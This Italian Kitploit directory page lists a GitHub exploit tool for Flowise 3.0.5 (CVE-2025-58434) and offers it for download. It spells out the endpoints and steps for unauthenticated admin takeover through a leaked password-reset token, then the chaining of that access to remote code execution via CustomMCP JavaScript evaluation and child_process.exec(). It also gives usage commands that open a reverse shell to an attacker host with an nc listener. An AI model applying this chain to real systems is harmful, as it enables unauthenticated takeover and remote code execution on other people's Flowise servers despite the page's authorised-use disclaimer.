Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-58434 — Catena di exploit per Flowise 3.0.5: acquisizione non autenticata dell'account tramite divulgazione del token di reset della password (CVE-2025-58434) combinata con la valutazione JavaScript di CustomMCP per l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/r3vpwnx/cve-2025-58434
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Catena di exploit per Flowise 3.0.5: acquisizione non autenticata dell'account tramite divulgazione del token di reset della password (CVE-2025-58434) combinata con la valutazione JavaScript di CustomMCP per l'esecuzione remota di codice.

Vedi Repository
22h 42m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-58434 - Acquisizione non autenticata dell'account Flowise, concatenata a RCE tramite CustomMCP

Due problemi di Flowise 3.0.5, concatenati:

  1. CVE-2025-58434 - divulgazione del token di reimpostazione password. POST /api/v1/account/forgot-password restituisce il tempToken dell'utente target direttamente nella risposta JSON. Forniscilo a POST /api/v1/account/reset-password per impostare una password nota per qualsiasi account, incluso il primo admin -> completa acquisizione non autenticata dell'account.
  2. Valutazione JavaScript lato server di mcpServerConfig in CustomMCP. Con una sessione e una chiave API del workspace (dal passaggio 1), POST /api/v1/node-load-method/customMCP con loadMethod=listActions valuta la stringa mcpServerConfig come JavaScript nel processo Flowise, fornendo RCE tramite . (Problema separato di Flowise usato qui solo per trasformare l'ATO in esecuzione di codice; nessun CVE assegnato al momento della scrittura.)
require('child_process').exec()

CVE: CVE-2025-58434

Requisiti

root@kitploit:~
python3 -m pip install requests

Utilizzo

flowise_ato_foothold.py - catena completa (ATO -> chiave API -> reverse shell CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# tieni pronto `nc -lvnp <LPORT>`

flowise_customMCP_rce.py - solo RCE CustomMCP (richiede una chiave API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<comando>' '<CHIAVE_API_FLOWISE>'

Riferimenti

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

Disclaimer

Solo per test di sicurezza autorizzati e scopi educativi. Esegui questo strumento esclusivamente contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.


Autore: r3vpwnx

Scarica lo strumento